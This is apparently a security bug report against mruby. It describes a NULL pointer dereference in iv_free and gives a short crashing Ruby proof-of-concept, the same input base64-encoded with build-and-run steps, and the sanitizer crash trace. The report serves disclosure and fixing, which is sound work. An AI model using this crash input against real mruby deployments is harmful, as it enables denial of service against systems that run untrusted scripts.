There is a NULL Pointer Dereference in iv_free (src/variable.c:232:20
). This bug has been found on mruby lastest commit (hash 00f2b74ab2c1f03084908c815dcd0934f9fc702a
) on Ubuntu 20.04 for x86_64/amd64.
3.times{e=0,"#{* =c={}
[y:0,**0]
0}"}
1- Clone repo and build with ASAN using MRUBY_CONFIG=build_config/clang-asan.rb rake
2- Use mruby to execute the poc:
$ echo -ne "My50aW1lc3tlPTAsIiN7KiA9Yz17fQpbeTowLCoqMF0KMH0ifQ==" | base64 -d > poc
$ mruby poc
/home/faraday/mruby/src/variable.c:232:20: runtime error: member access within misaligned address 0x000000000001 for type 'iv_tbl' (aka 'struct iv_tbl'), which requires 8 byte alignment
0x000000000001: note: pointer points here
<memory cannot be printed>
SUMMARY: UndefinedBehaviorSanitizer: undefined-behavior /home/faraday/mruby/src/variable.c:232:20 in
/home/faraday/mruby/src/variable.c:232:20: runtime error: load of misaligned address 0x000000000009 for type 'mrb_value *' (aka 'struct mrb_value *'), which requires 8 byte alignment
0x000000000009: note: pointer points here
<memory cannot be printed>
SUMMARY: UndefinedBehaviorSanitizer: undefined-behavior /home/faraday/mruby/src/variable.c:232:20 in
AddressSanitizer:DEADLYSIGNAL
=================================================================
==77626==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000009 (pc 0x0000007e9575 bp 0x62f000017fb8 sp 0x7fff1e800280 T0)
==77626==The signal is caused by a READ memory access.
==77626==Hint: address points to the zero page.
#0 0x7e9574 in iv_free /home/faraday/mruby/src/variable.c:232:20
#1 0x7e9574 in mrb_gc_free_iv /home/faraday/mruby/src/variable.c:278:5
#2 0x5efb1a in obj_free /home/faraday/mruby/src/gc.c:856:5
#3 0x5e26a5 in free_heap /home/faraday/mruby/src/gc.c:433:9
#4 0x5e26a5 in mrb_gc_destroy /home/faraday/mruby/src/gc.c:442:3
#5 0x63e1de in mrb_close /home/faraday/mruby/src/state.c:195:3
#6 0x4cb74a in main /home/faraday/mruby/mrbgems/mruby-bin-mruby/tools/mruby/mruby.c
#7 0x7fbe060530b2 in __libc_start_main /build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16
#8 0x41f89d in _start (/home/faraday/mruby/build/host/bin/mruby+0x41f89d)
AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV /home/faraday/mruby/src/variable.c:232:20 in iv_free
==77626==ABORTING
Running the same script with a release build (without asan) results in a segfault due to the invalid dereference.
This vulnerability is capable of making the mruby interpreter crash, thus affecting the availability of the system.
This bug was found by Octavio Gianatiempo ([email protected]) and Octavio Galland ([email protected]) from Faraday Research Team.